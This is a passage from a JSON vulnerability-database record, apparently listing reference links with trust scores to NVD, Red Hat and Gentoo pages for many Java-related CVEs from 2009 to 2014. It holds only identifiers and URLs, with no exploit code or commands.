"https://nvd.nist.gov/vuln/detail/cve-2011-3551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3553.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3545" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0865.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3516" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3545.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0862.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3561" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3556" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3544.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0867" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0506.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0501.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0869" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3560.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3550" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0865" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0502.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0498.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3560" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3546.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3552" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3544" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0869.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0863" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3550.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-5035.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3557" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0505.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0868" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0814" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2440" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2435" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2418" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0823.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1540" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1563" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0855.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": 